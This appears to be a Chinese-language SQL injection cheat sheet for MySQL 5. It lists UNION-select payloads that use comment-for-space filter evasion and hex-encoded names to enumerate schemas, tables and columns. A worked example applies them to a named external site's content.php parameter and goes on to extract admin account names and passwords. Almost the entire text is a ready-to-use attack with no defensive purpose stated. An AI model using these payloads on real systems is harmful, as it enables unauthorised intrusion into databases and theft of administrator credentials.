查库

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

查表

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1

查字段

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1

mysql5高级注入方法爆表

例子如下:

1.爆表
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 是数据库名 yd_teamnet 的16进制编码)
这样爆到第4个时出现了admin_user表。

2.爆字段
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3.爆密码
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
